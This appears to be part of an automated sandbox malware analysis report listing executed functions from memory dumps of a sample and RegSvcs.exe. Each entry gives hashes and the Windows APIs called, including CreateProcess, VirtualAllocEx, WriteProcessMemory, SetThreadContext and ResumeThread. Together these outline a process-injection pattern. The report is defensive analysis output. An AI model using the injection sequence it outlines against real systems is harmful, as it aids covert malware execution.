Opcode Fuzzy Hash: e1c0b04c5a924673e751ee062aac7e2ccbbc4cfb93e16bb28a7b43f8c71d6e29
Instruction Fuzzy Hash: CA21F0B26041568FEB159F64E454AAB3BA2FB88308F115029F805EF385CB38DD16CBE0

Function 00E2D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42aac175a5abec102d806eef3b4ca30db6069331ee4217b36aa42d824db87161
Instruction ID: 88aa658c157bb1143bdc0c37a72777f670173f01a9a4496571dc9b6f5e60f58d
Opcode Fuzzy Hash: 42aac175a5abec102d806eef3b4ca30db6069331ee4217b36aa42d824db87161
Instruction Fuzzy Hash: A02106759012488BDB08EFB0E851AEDB7B6FB89305F106429D411773A4CB359D45CF69

Function 00E25A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974169d33ac23cc84b66372d710d85992b89abcf5f5eaf5ca58aa9c24d91703f
Instruction ID: 85f0d5e52b4ae665390b91f0e700186912f3d93f6ba14cd95b8bbf0087cb914e
Opcode Fuzzy Hash: 974169d33ac23cc84b66372d710d85992b89abcf5f5eaf5ca58aa9c24d91703f
Instruction Fuzzy Hash: DA11E136301A229FD7199A29E8A892EB7A6FFC47517184178E806EF350CF34DC028BC0

Function 00C4D223 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2318512840.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c4d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction ID: 7fa2a211ee70a3a8923bbfcf7b7f140f772e876714ed9d5ca76e553e4185e193
Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction Fuzzy Hash: 6321B176504280DFCB16DF50D9C4B16BF72FB84314F24C5A9DD094B656C33AD916CBA2

Function 00E21F08 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd289889fee42627fecd73a1ec7632e23485b9dad9dc2b544341554bac9a2b5
Instruction ID: 70cb1783a7538bc29fa20c66232f450de5094bcc3017e7d4abb5bd3fb47c3708
Opcode Fuzzy Hash: bbd289889fee42627fecd73a1ec7632e23485b9dad9dc2b544341554bac9a2b5
Instruction Fuzzy Hash: 9B213470C042598FCB01EFB8D4944EEBFB1BF0A304F1451AAD805BB250EB305A85CBA2

Function 00E21F61 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3c4b9a7330938e45a0b98b780acfd65a3d41ecea3414a719ebfafd849f5c37
Instruction ID: 4383ae064757e76ce55906e91becdc4f6a1b1023536fcd1eee9a7cb0c9572ea0
Opcode Fuzzy Hash: 2d3c4b9a7330938e45a0b98b780acfd65a3d41ecea3414a719ebfafd849f5c37
Instruction Fuzzy Hash: 8421E0B4C142098FCB40EFA8D8555EEBBF5FF09304F10516AD805F7210EB345A84CBA1

Function 00E25607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1bf1fb7f63da57d6cbb104cd07a08663c1a111b7dacfd771dbc39ef2fba5be
Instruction ID: b96cf033c74911c6b1726abb6664175985f0099afb7476990a8d4d9fdc669208
Opcode Fuzzy Hash: 6a1bf1fb7f63da57d6cbb104cd07a08663c1a111b7dacfd771dbc39ef2fba5be
Instruction Fuzzy Hash: 12012873B041546FEB159E64A8106EE3FE7DBC9351B18802AF915E7380DE75CC0297A0

Function 00E22010 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78a5b56f3d31c3ccc7f0dcc63693180aa7b1aeeb553c103af8b9294baa5657d
Instruction ID: af058870bbf2dfd6991d2d2208ec474058d28a9caad87d6ceba6cd525c499d2d
Opcode Fuzzy Hash: f78a5b56f3d31c3ccc7f0dcc63693180aa7b1aeeb553c103af8b9294baa5657d
Instruction Fuzzy Hash: E5E0D835C253A75BCB01ABA5E8044DEBB34EE86220F4595A6D9A027141EB30161AC7A1

Function 00E22020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7765e21232e366d1074ce89745046aec22385f42445c533122d77c22e76c9f19
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: 7765e21232e366d1074ce89745046aec22385f42445c533122d77c22e76c9f19
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 00E28258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: ed453caee0d984fd19e5741a51e5cb31917eae0dd702d11dbde74e0abb5b9262
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 50C0123320E1386AA624508E7C40AA3AB8CC2C57B8A250137F95CA3200A8429C8001A8

Function 00E2A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408e2430b474b3220aacb24d83f699d2b62a8ade0456f9ad4636714f8171da8c
Instruction ID: 42ebe54d3ce7eb70711ff0a9102e7d041e52713736224c8e07d276f0e977b87f
Opcode Fuzzy Hash: 408e2430b474b3220aacb24d83f699d2b62a8ade0456f9ad4636714f8171da8c
Instruction Fuzzy Hash: B2D0677BB111089FCF049F98E8509DDB7B6FB9C261B048166F915E3260CA319D21DB50

Function 00E25EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de1c9c8d84d873abe717677f52169eb74f098d8e979d77b2de3dff8ebb4d48f
Instruction ID: a398fdf27eac665a5f4f7cab6a8ddfa17f574d5a91d3bbbfac121bf12dc58a87
Opcode Fuzzy Hash: 0de1c9c8d84d873abe717677f52169eb74f098d8e979d77b2de3dff8ebb4d48f
Instruction Fuzzy Hash: 79C0123050034A8BD609F775F9455193B5AFAC0300F406918B2094D21DDFFC1D495A99

Analysis Process: djqdPdQRO.exePID: 6628, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	161
Total number of Limit Nodes:	4

Executed Functions

Function 06B35D18 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2284312196.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b30000_djqdPdQRO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afdedd5dbdf301b1d59470155a9a056285389357f5df37cd8cb063bbade594a8
Instruction ID: cbb263c4a41e4199f24b67d94288d5ef6e356e5728e9af711c56dbb88a3ccd02
Opcode Fuzzy Hash: afdedd5dbdf301b1d59470155a9a056285389357f5df37cd8cb063bbade594a8
Instruction Fuzzy Hash: 09126E75B002259FCB54DB68C8949AEBBF6EF88310B1591A9E906EB365DF30DC41CB90

Function 06B7D7F0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2284487569.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b70000_djqdPdQRO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a78be20b6a709594ed0bff1232dee77b8b83d30077324dc5d4e74a040a1128a
Instruction ID: ded5a56bce3c6efa08dab3d2dc70c0dc2db9b9e9eb4b900b136f535ebab25e10
Opcode Fuzzy Hash: 9a78be20b6a709594ed0bff1232dee77b8b83d30077324dc5d4e74a040a1128a
Instruction Fuzzy Hash: 012238B0A00218CFDB55DF64C894B9DBBB2FF89340F1480A9E819AB255DB31DD85CF51

Function 06B3BD40 Relevance: 5.4, Strings: 4, Instructions: 413
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Cb@l^, xrefs: 06B3C146
Sb@l^, xrefs: 06B3C0AD
sb@l^, xrefs: 06B3BFB7
cb@l^, xrefs: 06B3C032

Memory Dump Source

Source File: 00000009.00000002.2284312196.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b30000_djqdPdQRO.jbxd

Similarity

API ID:
String ID: Cb@l^$Sb@l^$cb@l^$sb@l^
API String ID: 0-2471479993
Opcode ID: b5d3a5e9bc9a41329cd1e62715aba7143f4b735f5e382f5740fb31dfa9a1b3a0
Instruction ID: 08b549351442edced2077bbe76ad495241b84394f799f5b5ff12de484e237d4b
Opcode Fuzzy Hash: b5d3a5e9bc9a41329cd1e62715aba7143f4b735f5e382f5740fb31dfa9a1b3a0
Instruction Fuzzy Hash: A7E18EB1B006268BDB55EFADD840A5E7BE2EFC4740F109569D906EB348EF74DC058B80

Function 06BE0EB8 Relevance: 3.3, Instructions: 3304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2284688066.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6be0000_djqdPdQRO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce85f770e1ce8a0fc9af823a18d708bbc04e3de70ac87200ef3d66df72c0199
Instruction ID: 1afef809af6fb0f65b53514396cf2eab4e51d4d3ac730ff922077e2b5ee68b58
Opcode Fuzzy Hash: 1ce85f770e1ce8a0fc9af823a18d708bbc04e3de70ac87200ef3d66df72c0199
Instruction Fuzzy Hash: C8637CB0A40219AFEB759BA0CC55BEEBB72EF84700F1041D9E70A7B2D1DA715E848F45

Function 081B79BC Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B7BFE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 29f74713689bf5c0f06e1aa92ef97c28053d3d17e490697013ab463f5ec53c7b
Instruction ID: e7357d6112f49390ae9f44c7262b34b30c87c22a5f391bae32e6c2207f433fe1
Opcode Fuzzy Hash: 29f74713689bf5c0f06e1aa92ef97c28053d3d17e490697013ab463f5ec53c7b
Instruction Fuzzy Hash: E3A14F71D0035ADFDB24CF68C9417EDBBB2BF84311F148569E819A7280DB749985CFA1

Function 081B79C8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B7BFE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fff3232ff21592a6f9a10e0c8ab9521e73a72e6edf3add5b4df4a978f2073cbb
Instruction ID: 2d313a63b2dd4116631fdb6f97715cb217ab4ecb7af270e124e8a6a8bf235542
Opcode Fuzzy Hash: fff3232ff21592a6f9a10e0c8ab9521e73a72e6edf3add5b4df4a978f2073cbb
Instruction Fuzzy Hash: 79913E71D0031ADFDB24DF68C9417EDBBB2BF88311F148669E819A7280DB749985CF91

Function 06B35520 Relevance: 1.7, Strings: 1, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 06B35775

Memory Dump Source

Source File: 00000009.00000002.2284312196.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b30000_djqdPdQRO.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 42feb78fc2fc6f93dc77d1befc4a97ed863901548c5692bfa5f27cd3b0daca43
Instruction ID: 5794497bbf607578a2f304684f8c069c60c6bce5b346f8966e433bed3291b8da
Opcode Fuzzy Hash: 42feb78fc2fc6f93dc77d1befc4a97ed863901548c5692bfa5f27cd3b0daca43
Instruction Fuzzy Hash: 0A0269B5B00615CFD760CF29C48096ABBF2FF88314B25C6A9D55A9B761DB30F846CB90

Function 009BB417 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 009BB67E

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 94ccd736bd08d307d24369c73ef7c9607f953a3888ca09d2364952cd14f4c412
Instruction ID: 3b22fb0020c58e14e2b4e8cdfb54eff4c7a6310d750ed44e7ec759d13cf961fe
Opcode Fuzzy Hash: 94ccd736bd08d307d24369c73ef7c9607f953a3888ca09d2364952cd14f4c412
Instruction Fuzzy Hash: D5816970A00B058FD724DF2AD55579ABBF5FF88310F00892EE48AD7A91D7B4E845CB91

Function 009BB2F8 Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009BD8CE,?,?,?,?,?), ref: 009BD98F

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 26eda5ab5c76babf82b7b18c25dab8ff78e73831fdea2eb6506add161ce1727e
Instruction ID: 1f3f51600efe1965ee7a4153345ce95ece88c090f3bb81bfcf0ad3af65330ea6
Opcode Fuzzy Hash: 26eda5ab5c76babf82b7b18c25dab8ff78e73831fdea2eb6506add161ce1727e
Instruction Fuzzy Hash: 0A51B671A01348DFEB01CF69C5847DABFF1EF45324F14485AE641AB252C3B9A846CBA0

Function 009B44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009B59C9

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fd1abdb4164efa711081e165f06e2306fd7620207d0decf8511aa8244bb577c2
Instruction ID: 5fd8348858edaa041f27aae9481a52a31aa15035e8f82137908f4611e1e8ad22
Opcode Fuzzy Hash: fd1abdb4164efa711081e165f06e2306fd7620207d0decf8511aa8244bb577c2
Instruction Fuzzy Hash: ED41BCB0C00B1DCBEB24CFA9C984B9EBBB5AF48714F60816AD408AB251DB756945CF90

Function 009B590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009B59C9

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d22b3c89ed12f4f3eb89521ece32325a53c1646ce688ad4cfcad08b0d3e9d741
Instruction ID: 5d1d1140c50d2658d36b8592b266a308c9026160cad84c355d7c30f826163c03
Opcode Fuzzy Hash: d22b3c89ed12f4f3eb89521ece32325a53c1646ce688ad4cfcad08b0d3e9d741
Instruction Fuzzy Hash: 1641EFB0C00719CBEB24CFA9C984BCDBBB5BF48714F20816AD408AB251DB756945CF50

Function 081B7738 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B77D0

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9000cfada4442a461467d98d08575548e15b89fe0ccb2cef0e2a2d1dfddacee3
Instruction ID: 8c9b0c0ec45e3b3a3ee9edcf744ddac4cc335a0ba2bd534a86ee7254eb23f02e
Opcode Fuzzy Hash: 9000cfada4442a461467d98d08575548e15b89fe0ccb2cef0e2a2d1dfddacee3
Instruction Fuzzy Hash: 53212AB69013499FDF10CFA9C885BDEBBF5FF88310F108829E919A7240D7789554CBA4

Function 081B7740 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B77D0

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 01b1726c1dfd3cb1a85202f80c3bcb7e093d0188e2d2da1e877d7f9e445a137b
Instruction ID: 201df41014c9f013e5bdbb50a24fffb8ca420d3e958f96cf6555b1662dc0ac58
Opcode Fuzzy Hash: 01b1726c1dfd3cb1a85202f80c3bcb7e093d0188e2d2da1e877d7f9e445a137b
Instruction Fuzzy Hash: AA2127769013499FDF10CFA9C885BDEBBF5FF88310F108829E919A7240C778A950CBA4

Function 009BB314 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009BD8CE,?,?,?,?,?), ref: 009BD98F

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eaa69ccb6413726bc0be663f092157a3af77716fb9dc1405b2f8bc7bfddb1857
Instruction ID: 33d241c2ab854f711378cdfdc35432c2cb442c847d1115a60b03ecc3075bdad7
Opcode Fuzzy Hash: eaa69ccb6413726bc0be663f092157a3af77716fb9dc1405b2f8bc7bfddb1857
Instruction Fuzzy Hash: EA21E3B59012099FDB10CFAAD984ADEBBF8FB48320F14841AE954B3310D378A950CFA5

Function 009BD900 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009BD8CE,?,?,?,?,?), ref: 009BD98F

Memory Dump Source

Source File: 00000009.00000002.2278493828.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9b0000_djqdPdQRO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6dd6f67e76fa67671607b4fcf7773e0d1883a1160df06fa653a737ff8ec59915
Instruction ID: f6ac7cd0b3ef2751561fc9a98b10174ffb9958800d4fb9cc1f2aca2eeec233c5
Opcode Fuzzy Hash: 6dd6f67e76fa67671607b4fcf7773e0d1883a1160df06fa653a737ff8ec59915
Instruction Fuzzy Hash: B521E4B59012099FDB10CF9AD984ADEFFF8FB48320F14841AE918A7350D778A950CFA5

Function 081B7828 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B78B0

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a50a23b05f7f4de946b45fe936f1ccbe66084c7854890a34cb205eb152c8a488
Instruction ID: d2328fc52cb2ac472bb77014d43cef8e35f6927e5015d5de874a302812908c61
Opcode Fuzzy Hash: a50a23b05f7f4de946b45fe936f1ccbe66084c7854890a34cb205eb152c8a488
Instruction Fuzzy Hash: 062119B1D003499FDB10DFAAC881BDEBBF5FF48310F508429E519A7240D7799550CBA5

Function 081B716A Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B71EE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 21d775493dea6379e0b1fde8dc95961b0cb842b9bf90965dd2a51baf5c27dbf5
Instruction ID: cc5f10563a4a86861b0e9f09c1a28b3a7adfd158323fa2af73b195e488ebe024
Opcode Fuzzy Hash: 21d775493dea6379e0b1fde8dc95961b0cb842b9bf90965dd2a51baf5c27dbf5
Instruction Fuzzy Hash: 622138719003098FDB10DFAAC485BEEBBF4EF88324F14842DD559A7241DB78A945CFA5

Function 081B7830 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B78B0

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ebfed61866eb8efec0ee366837881c7e86caabd103d44b03387095f449989bea
Instruction ID: efbc8b76345fee383ef80d7e6aab2af022f44d9366ed6de1057c6829cf90b29b
Opcode Fuzzy Hash: ebfed61866eb8efec0ee366837881c7e86caabd103d44b03387095f449989bea
Instruction Fuzzy Hash: 1D21F871D003499FDB10DFAAC881BEEBBF5FF88310F508429E519A7240D779A550CBA5

Function 081B7170 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B71EE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 40829ffedad7d449530b1902f89ac3ec119010cf4ef949e1facc0d931c5490db
Instruction ID: 2efa963a5532837b5e301925266f6bf9a693b02a1d9758c40e6e6e8a4a8d768d
Opcode Fuzzy Hash: 40829ffedad7d449530b1902f89ac3ec119010cf4ef949e1facc0d931c5490db
Instruction Fuzzy Hash: C42129719003098FDB10DFAAC4857EEBBF4EF88324F14842DD519A7240DB78A944CFA5

Function 081B7678 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B76EE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 07b1606eaac4488fdbdc8dcbb0d7424bee527b06e666e5266fb7e6c78f55afbf
Instruction ID: 3087136a8757dfaf7efbff43d4091fae6616e850990e7c3104a6ac9546dd0cbb
Opcode Fuzzy Hash: 07b1606eaac4488fdbdc8dcbb0d7424bee527b06e666e5266fb7e6c78f55afbf
Instruction Fuzzy Hash: F91144729002499FDF10DFAAC845BDEBBF5AF88320F248819E519A7250CB79A510CBA4

Function 081B7680 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B76EE

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 80f2ee44e98f9259042bf1a5e08355cf465ca10cb7520100c2b9fa187bb7fe8a
Instruction ID: a9f2eaee1e6b6af107f542fbc8ba16df8ecd531a2e38a3c45fc2f0cfa298fbd2
Opcode Fuzzy Hash: 80f2ee44e98f9259042bf1a5e08355cf465ca10cb7520100c2b9fa187bb7fe8a
Instruction Fuzzy Hash: C91126729002499FDB10DFAAC845BDEBBF5AF88320F248819E519A7250CB75A550CBA5

Function 081B6C80 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 081B6CEA

Memory Dump Source

Source File: 00000009.00000002.2284863474.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81b0000_djqdPdQRO.jbxd

Similarity

